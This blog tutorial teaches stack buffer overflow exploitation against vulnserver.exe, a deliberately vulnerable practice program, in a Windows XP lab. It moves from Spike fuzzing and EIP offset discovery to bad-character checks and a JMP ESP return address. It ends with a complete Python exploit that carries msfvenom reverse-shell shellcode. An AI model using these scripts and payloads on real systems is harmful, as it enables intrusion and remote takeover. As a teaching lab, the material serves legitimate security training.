Wednesday, July 31, 2019

Bonus Content: How To Properly EXPLOIT A Buffer Overflow (2019 Revision)

Today, I will explain the mega process of buffer overflows by using the vulnserver.exe app.

Here is a quick diagram to explain buffer overflows:

[Diagram: buffer overflow overview]

You can download it here: https://github.com/stephenbradshaw/vulnserver

Also, get yourself a copy of Windows XP Professional SP3:  https://archive.org/details/WinXPProSP3x86

And Kali Linux, which we will use for the Python scripts that crash the service and then exploit the overflow to get a shell.

The serial is included inside the link as well.

It is free, since that version of Windows is already out of date.

Once you have Windows XP SP3 Professional 32-bit installed (64-bit will not work), download Immunity Debugger from this link:

https://www.immunityinc.com/products/debugger/

We will use this to debug the buffer overflow.

First off, we fuzz the input of vulnserver.exe with Spike to find a command that crashes it.

We also need to identify the protocol of vulnserver by using netcat.

nc -nv <WinXP IP address> 9999

Command line:  nc -nv 192.168.1.83 9999

The purpose of this step is to see the protocol the service speaks (its banner and the commands it accepts) before we fuzz it.

First step of the buffer overflow process:  Spike!

Create Spike templates

Spike templates describe the packet format of the communication. We tell Spike which parameters should be fuzzed. For example, the following template (command.spk) sends various commands to Vulnserver:

s_readline();
s_string_variable("COMMAND");

Since TRUN is the vulnerable command, we can concentrate on it. The following template (trun.spk) sends the TRUN command with various parameters:

s_readline();
s_string("TRUN ");
s_string_variable("0");

Vulnserver has a number of commands, so we can create similar templates for each of them.

Spike is capable of sending both TCP and UDP packets.  For now, we will use the generic_send_tcp command.  The proper form is:

generic_send_tcp <IP address> <port number> <template name> <SKIPVAR> <SKIPSTR>

Before we start sending packets, we have to set up the environment:
  1. On Windows XP, start vulnserver.
  2. Start Immunity Debugger, attach it to vulnserver and press the play button (F9) so that the process keeps running under the debugger instead of staying paused.
  3. On Kali, start Wireshark and start capturing.
Then start fuzzing: generic_send_tcp 192.168.1.83 9999 trun.spk 0 0

When there is a crash, we can find the last packet in Wireshark. We then write a Python script which sends that same packet to the application and use it as our proof of concept. For example, trun.spk causes the application to crash.

The crash happened at the second packet: there is no welcome message after it. Let us find that packet in Wireshark.


We have the format and size of the packet that causes the buffer overflow. The PoC Python script:

#!/usr/bin/python
# Python 2 script: string literals are byte strings, so they can be sent as-is.

import socket

host = "192.168.1.83"
port = 9999

# Replay the packet that crashed vulnserver: the TRUN command followed by 5075 A's
buffer = "TRUN /.:/" + "A" * 5075

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Part 2:  Buffer Overflow!! :)

1. Identify the position of EIP

We sent 5075 "A" characters and EIP was overwritten with 41414141, which is four ASCII "A" characters (0x41). So EIP was overwritten from our buffer; if we find the position of EIP within our buffer, we can overwrite it with any value we want.
Metasploit ships a tool which generates a unique (cyclic) pattern. If we send that pattern instead of the "A" characters, the bytes that land in EIP identify their own position, and a second Metasploit tool computes the offset from them. Generate the unique pattern:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5075

Copy the pattern into the PoC Python script and send it; this payload tells us where in the buffer the value of EIP comes from.

#!/usr/bin/python
# Python 2 script

import socket

host = "192.168.1.83"
port = 9999

#buffer = "TRUN /.:/" + "A" * 5075
# 5075-byte unique pattern from pattern_create.rb. The literal is split into
# three pieces for readability; Python joins adjacent string literals into one.
buffer = "TRUN /.:/" + (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7C"
    "n8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4"
    "Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn"
)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()


Immunity Debugger now shows the value that landed in EIP: 386F4337.

Now we run the other Metasploit tool, pattern_offset.rb, with that EIP value.

pattern_offset.rb reports that the exact offset is 2003:

root@kali:~/Downloads/bufferOverflowPractice# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386F4337
[*] Exact match at offset 2003

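To see why the two Metasploit tools agree on 2003, here is an added example (not from the original post, and not Metasploit's code) that reimplements what pattern_create.rb and pattern_offset.rb do in plain Python 3: it builds the same Upper-lower-digit cyclic pattern, undoes the little-endian byte order of the EIP value the debugger shows, and searches for those four characters in the pattern. It assumes Metasploit's default character sets (A-Z, a-z, 0-9) and a pattern shorter than 20280 bytes, which is where the cycle would start repeating.

```python
import string
import struct


def pattern_create(length):
    """Reproduce pattern_create.rb: cycle Upper-lower-digit triples
    (Aa0Aa1...Aa9Ab0...Az9Ba0...) and return the first `length` characters."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    # 26 * 26 * 10 triples = 20280 characters; beyond that the pattern repeats
    return "".join(triples)[:length]


def eip_to_needle(eip_hex):
    """Turn the 8 hex digits the debugger shows (e.g. "386F4337") into the 4
    pattern characters that were loaded into EIP.

    x86 is little-endian: the byte at the lowest address is the least significant
    byte of the register, so 0x386F4337 came from the memory bytes 37 43 6F 38,
    i.e. the text "7Co8". latin-1 never fails to decode, so a value that is not
    made of pattern characters simply will not be found."""
    return struct.pack("<I", int(eip_hex, 16)).decode("latin-1")


def pattern_offset(length, eip_hex):
    """Reproduce pattern_offset.rb -q: the offset of the EIP bytes inside the
    pattern, or None if EIP does not contain pattern characters at all (which
    would mean EIP was not overwritten from our buffer)."""
    needle = eip_to_needle(eip_hex)
    offset = pattern_create(length).find(needle)
    return None if offset < 0 else offset


if __name__ == "__main__":
    # The values from the post: a 5075-byte pattern and EIP = 386F4337
    print("EIP bytes as text:", eip_to_needle("386F4337"))
    print("Exact match at offset", pattern_offset(5075, "386F4337"))
```

Because every 4-character window of the pattern is unique within the first 20280 bytes, a single lookup is enough; if pattern_offset returns None, the crash did not overwrite EIP with our data and the length or the command needs another look before going further.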
Update the PoC script the following way: first send 2003 A characters, then 4 B characters, then C characters to fill up the rest of the 5075 bytes.
…  A   A   A   A   A | B   B   B   B | C   C   C   C   C  …

The updated PoC script will be:

#!/usr/bin/python
# Python 2 script

import socket

host = "192.168.1.83"
port = 9999

# 2003 bytes of padding, then 4 B's (0x42) that should land in EIP,
# then C's so that the total payload is still 5075 bytes
buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * (5075 - 2003 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Now EIP is overwritten with B's: the debugger shows 42424242, which is four ASCII B characters (0x42). We control the return address.

2. Check for bad characters

The buffer must not contain zero bytes, because 0x00 terminates the string and makes the attack fail. We have to check whether there are other bad characters. To do that, we send a buffer containing every byte value (except 0x00) right after the return address and compare it with what the debugger shows on the stack.

#!/usr/bin/python
# Python 2 script

import socket

host = "192.168.1.83"
port = 9999

# Every byte value except 0x00, which we already know terminates the string
chars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# The test bytes go right after the 4-byte EIP overwrite, i.e. where ESP points,
# so they are easy to find in the debugger's stack window
buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + chars + "C" * (5075 - 2003 - 4 - len(chars))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()


We can now see that the only bad character here is zero (0x00).

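Comparing 255 bytes against the debugger's memory window by eye is error-prone, so here is an added example (not part of the original post) that does the comparison in Python 3: it builds the same candidate byte set, parses a dump copied out of the debugger's memory window, and reports the first byte that was altered or cut off. The dump it runs on is constructed for illustration (a hypothetical service that rewrites 0x0A into 0x00); it is not a dump from vulnserver, where the post found only 0x00 to be bad. The dump format and base address are assumptions.

```python
def candidate_bytes(exclude=(0x00,)):
    """Every byte value except those already known to be bad; 0x00 is left out
    from the start because it terminates the string, as the post explains."""
    return bytes(b for b in range(256) if b not in exclude)


def format_dump(data, base=0x0107F1F0, width=16):
    """Render bytes the way a debugger memory window does: address, then hex
    bytes. Used here only to build the constructed sample (the base address is
    made up)."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        lines.append("%08X  %s" % (base + off, " ".join("%02X" % b for b in chunk)))
    return "\n".join(lines)


def parse_hex_dump(dump):
    """Parse lines of the form "ADDRESS  HH HH HH ..." back into bytes, ignoring
    the address column, so a dump copied from the debugger can be compared
    directly with what we sent."""
    out = bytearray()
    for line in dump.strip().splitlines():
        out.extend(int(h, 16) for h in line.split()[1:])
    return bytes(out)


def find_bad_chars(sent, observed):
    """Compare what we sent with what reached the stack.

    Returns (first_bad, mismatches). first_bad is the first sent byte that was
    altered or missing (None if everything survived); that is the byte to
    exclude before re-testing, because one bad byte usually corrupts or
    truncates everything behind it, so later mismatches may just be collateral.
    mismatches lists (index, sent_byte, observed_byte_or_None) for every
    position that differs."""
    mismatches = []
    for i, b in enumerate(sent):
        if i >= len(observed):
            mismatches.append((i, b, None))          # copy was truncated here
        elif observed[i] != b:
            mismatches.append((i, b, observed[i]))   # byte was rewritten
    first_bad = mismatches[0][1] if mismatches else None
    return first_bad, mismatches


# Constructed scenario (not vulnserver): a hypothetical service that rewrites
# 0x0A into 0x00 but leaves every other byte alone.
SENT = candidate_bytes()
OBSERVED_DUMP = format_dump(SENT.replace(b"\x0a", b"\x00"))


def demo():
    """Run the comparison on the constructed dump; returns (first_bad, count)."""
    first_bad, mismatches = find_bad_chars(SENT, parse_hex_dump(OBSERVED_DUMP))
    return first_bad, len(mismatches)


if __name__ == "__main__":
    first_bad, count = demo()
    print("first bad byte: 0x%02x (%d position(s) differ)" % (first_bad, count))
```

In practice the loop is iterative, exactly as in the manual procedure: remove the reported byte from the candidate set with candidate_bytes(exclude=(0x00, first_bad)), send again, and repeat until find_bad_chars returns None. A truncated dump (the service stopped copying at some byte) shows up as a mismatch whose observed value is None.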
3. Find an address for EIP

In this step we have to check the registers and the stack. We have to find a way to jump to our buffer to execute our code. ESP points to the beginning of the C part of our buffer, so we need a JMP ESP or CALL ESP instruction. Do not forget that the address must not contain bad characters!
Open the executable modules list in Immunity Debugger (it is based on OllyDbg; press the E button on the toolbar). Select a module, for example essfunc.dll. (vulnserver.exe itself would not be a good choice, as its addresses contain a zero byte!) Make sure that the DLL is actually loaded by the process.

Right-click the code pane and select Search for / All commands. Enter JMP ESP. A couple of possible addresses are displayed. Select one.

Your addresses may differ from mine depending on which JMP ESP you pick.

Remember that the address has to be written in little-endian byte order, because x86 is a little-endian architecture: the least significant byte goes first, so 625011AF becomes the bytes \xaf\x11\x50\x62.

Exploit Code:

#!/usr/bin/python
# Python 2 script

import socket

host = "192.168.1.83"
port = 9999

# 625011AF   JMP ESP  (in essfunc.dll), written in little-endian byte order
buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "C" * (5075 - 2003 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Send this buffer to Vulnserver, but first set a breakpoint at the chosen address and check whether it is hit.

It is hit: EIP (the instruction pointer) now holds 625011AF, our JMP ESP address.

4. Popping the shell (adding shellcode to the exploit)

Generate a shellcode with msfvenom:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<attacker's IP address> LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f python

An encoder has to be used, because the raw windows/shell_reverse_tcp payload contains zero bytes, and 0x00 is our bad character (-b '\x00' tells msfvenom to avoid it).
Place the generated code into the PoC script and update the buffer so that the shellcode is placed after the EIP overwrite, in the C part. Put some NOP instructions (NOP = 0x90) before the shellcode; this is what is called a NOP sled. The final exploit:

#!/usr/bin/python
# Python 2 script

import socket

host = "192.168.1.83"
port = 9999

# Reverse shell generated by msfvenom (windows/shell_reverse_tcp, encoded with
# x86/shikata_ga_nai so that it contains no 0x00 byte)
buf =  ""
buf += "\xb8\x6f\x21\x4d\x34\xd9\xcf\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\xad\x25\xaf"
buf += "\xc1\xcd\xce\xad\x2a\x2d\x0f\xd2\xa3\xc8\x3e\xd2\xd0"
buf += "\x99\x11\xe2\x93\xcf\x9d\x89\xf6\xfb\x16\xff\xde\x0c"
buf += "\x9e\x4a\x39\x23\x1f\xe6\x79\x22\xa3\xf5\xad\x84\x9a"
buf += "\x35\xa0\xc5\xdb\x28\x49\x97\xb4\x27\xfc\x07\xb0\x72"
buf += "\x3d\xac\x8a\x93\x45\x51\x5a\x95\x64\xc4\xd0\xcc\xa6"
buf += "\xe7\x35\x65\xef\xff\x5a\x40\xb9\x74\xa8\x3e\x38\x5c"
buf += "\xe0\xbf\x97\xa1\xcc\x4d\xe9\xe6\xeb\xad\x9c\x1e\x08"
buf += "\x53\xa7\xe5\x72\x8f\x22\xfd\xd5\x44\x94\xd9\xe4\x89"
buf += "\x43\xaa\xeb\x66\x07\xf4\xef\x79\xc4\x8f\x14\xf1\xeb"
buf += "\x5f\x9d\x41\xc8\x7b\xc5\x12\x71\xda\xa3\xf5\x8e\x3c"
buf += "\x0c\xa9\x2a\x37\xa1\xbe\x46\x1a\xae\x73\x6b\xa4\x2e"
buf += "\x1c\xfc\xd7\x1c\x83\x56\x7f\x2d\x4c\x71\x78\x52\x67"
buf += "\xc5\x16\xad\x88\x36\x3f\x6a\xdc\x66\x57\x5b\x5d\xed"
buf += "\xa7\x64\x88\xa2\xf7\xca\x63\x03\xa7\xaa\xd3\xeb\xad"
buf += "\x24\x0b\x0b\xce\xee\x24\xa6\x35\x79\x8b\x9f\x34\x21"
buf += "\x63\xe2\x36\xc0\x2f\x6b\xd0\x88\xdf\x3d\x4b\x25\x79"
buf += "\x64\x07\xd4\x86\xb2\x62\xd6\x0d\x31\x93\x99\xe5\x3c"
buf += "\x87\x4e\x06\x0b\xf5\xd9\x19\xa1\x91\x86\x88\x2e\x61"
buf += "\xc0\xb0\xf8\x36\x85\x07\xf1\xd2\x3b\x31\xab\xc0\xc1"
buf += "\xa7\x94\x40\x1e\x14\x1a\x49\xd3\x20\x38\x59\x2d\xa8"
buf += "\x04\x0d\xe1\xff\xd2\xfb\x47\x56\x95\x55\x1e\x05\x7f"
buf += "\x31\xe7\x65\x40\x47\xe8\xa3\x36\xa7\x59\x1a\x0f\xd8"
buf += "\x56\xca\x87\xa1\x8a\x6a\x67\x78\x0f\x9a\x22\x20\x26"
buf += "\x33\xeb\xb1\x7a\x5e\x0c\x6c\xb8\x67\x8f\x84\x41\x9c"
buf += "\x8f\xed\x44\xd8\x17\x1e\x35\x71\xf2\x20\xea\x72\xd7"
# 625011AF   JMP ESP  (essfunc.dll), little-endian
# Layout: 2003 A's | return address | 16-byte NOP sled | shellcode | C filler,
# so that the payload is still exactly 5075 bytes long
buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 + buf + "C" * (5075 - 2003 - 4 - 16 - len(buf))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

